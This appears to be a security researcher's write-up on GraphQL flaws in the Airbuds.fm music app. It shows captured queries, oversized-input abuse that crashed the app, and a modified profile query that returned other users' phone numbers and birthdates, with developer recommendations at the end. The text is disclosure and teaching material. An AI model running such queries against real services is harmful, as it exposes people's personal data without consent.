Airbuds.fm: GraphQL Privacy Oversight in a Social Music App
š§ Why I Looked Into This
In early October 2024, I started investigating the Airbuds.fm app. At the time, it had grown to over 3 million users and ranked among the top 10 music apps on the App Store. Airbuds.fm is a social music app that lets users share listening activity and weekly music stats with friends.
Like many mobile apps, it uses a GraphQL API on the backendāa pattern Iāve seen repeatedly across mobile platforms. This would be the third app in a row Iāve reviewed with significant GraphQL security concerns.
š Initial Discovery
ā Introspection Query Disabled
First check: introspection. Many GraphQL vulnerabilities start with the schema being exposed via an introspection query:
graphqlCopyEditquery IntrospectionQuery {
__schema {
queryType { name }
types {
name
fields { name }
}
}
}
In Airbuds.fmās case, they followed best practices and had introspection disabled in production. Thatās a win.
But that didnāt stop the investigation.
š Native Query Analysis
Without introspection, I turned to traffic from the app itself using a MITM proxy. I identified three key GraphQL operations to investigate:
1. SendDM
graphqlCopyEditmutation SendDM($message: String!) {
sendDM(message: $message) {
id
text
createdAt
}
}
2. ReactToFeedActivity
graphqlCopyEditmutation ReactToFeedActivity($reaction: CreateFeedActivityReactionInput!) {
reactToFeedActivity(reaction: $reaction) {
__typename
}
}
3. UserProfile and Me
graphqlCopyEditquery Me {
me {
profileURL
phone
phoneVerified
birthdate
}
}
query UserProfile($identifier: String!) {
user(identifier: $identifier) {
profileURL
}
}
These gave me the groundwork for two lines of testing:
- Character limit abuse
- Parameter modification for sensitive data exposure
š Character Limit Testing
For abuse testing, I use the Bee Movie scriptāa large block of text that serves as a simple stress test.
š¬ DM Injection
I used the Bee Movie script as a direct message:
ā
It sent successfully
ā
No app crash
ā
Full render, screenshot captured
šµ Emoji Reaction Abuse
I injected the Bee Movie script as a song reaction emoji:
ā
Successfully submitted
š„ Crashed the app when scrolling past the affected post
š§¹ Resolved by deleting the reaction using a modified delete query
These tests confirmed the absence of input limits on both endpointsāclient-side checks were in place, but server-side validation was missing.
š Unauthorized Data Exposure
The most impactful finding came from modifying the UserProfile query to match the structure of the authenticated Me query:
graphqlCopyEditquery UserProfile($identifier: String!) {
user(identifier: $identifier) {
profileURL
phone
phoneVerified
birthdate
}
}
ā Result:
jsonCopyEdit{
"data": {
"user": {
"profileURL": "https://i.airbuds.fm/redacted",
"phone": "REDACTED",
"phoneVerified": true,
"birthdate": "REDACTED"
}
}
}
Despite being unauthenticated, this query returned private user data, including:
- Phone numbers
- Birthday
- Phone verification status
While the attack surface was narrowed by requiring valid usernames, with automation this could be used to scrape PII at scale.
š§ Key Lessons & Recommendations
ā Wins:
- Introspection disabled
- DM and profile endpoints rejected spoofing attempts
ā ļø Issues Identified:
- No character limit on message and emoji inputs
- Sensitive fields exposed through unauthorized parameter injection
- No field-level access controls on public queries
- Client-side checks not mirrored server-side
š Recommendations for Devs
- Enforce input validation server-side, not just in the client
- Limit character length on all user-input fields (emoji, DM, bio, etc.)
- Implement strict field-level access control
- Disable unnecessary fields in public queries
- Regularly test your GraphQL schema using manual and automated abuse simulation
š¬ Final Thoughts
Airbuds.fm isnāt the first app Iāve seen with these issuesāand wonāt be the last. GraphQL APIs are flexible but unforgiving if you donāt secure them properly.
This app did take important precautions like disabling introspection and rejecting unauthorized user spoofing. But it also had avoidable oversights in data exposure and payload validation.
For security researchers, this case is a reminder: just because introspection is disabled doesnāt mean an API is safe.